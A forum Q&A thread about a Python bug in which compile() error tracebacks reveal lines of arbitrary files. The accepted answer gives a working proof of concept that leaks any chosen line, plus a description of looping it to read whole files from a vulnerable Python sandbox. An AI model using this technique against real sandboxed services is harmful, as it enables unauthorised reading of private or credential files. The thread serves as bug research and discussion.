# Leak multiple lines from file

Tags: python, exploit-development, error-handling

I am researching this bug [here](https://bugs.python.org/issue30637), where the first line of an arbitrary file can be leaked by triggering a SyntaxError using the `compile()` function.

Is there a method of leaking the rest of the file, such as similar to the way Heartbleed leaks data from server memory?

In Heartbleed, you can open a listener port on your computer and spam the targeted server with a specially crafted request to leak the response bit-by-bit.

I am using a vulnerable python sandbox hosted on a server. The code is compiled on the server. With the bug above I can leak the first line of any file. Is there a way, using only `builtins` and the standard library to leak the remaining lines of the file?

Comment: @MechMK1 Edited the question to clarify. Sorry, my bad I didn't realise I typed 'files'.

Comment: truncate the first line then re-"compile"? That would appear to be the most obvious approach.

Answer (score 2, accepted):

I [posted](https://bugs.python.org/issue38985) about it on the python bug tracker and got some advice.

Since python interprets files line-by-line, we can delay the termination error, which leads to this interesting bug, simply by adding a new line `\n` to leak a line at a time.

The proof of concept is as follows:

1. Create target File

```
$ cat /tmp/passwd
line 1
line 2
line 3
line 4
```

2. Read from target File

```
$ python -c 'compile("\n\n\nyield", "/tmp/passwd", "exec")'
Traceback (most recent call last):
  File "<string>", line 1, in <module>
  File "/tmp/passwd", line 4
    line 4
    ^
SyntaxError: 'yield' outside function
```

By writing a simple catch loop, it is possible to leak all lines of an unknown file on the system. However, as stated by a reviewer on the tracker, this is only practical for a sandbox escape. Even though Python isn't built for sandboxing, if someone were to implement one, the `compile` function must be among the first to go.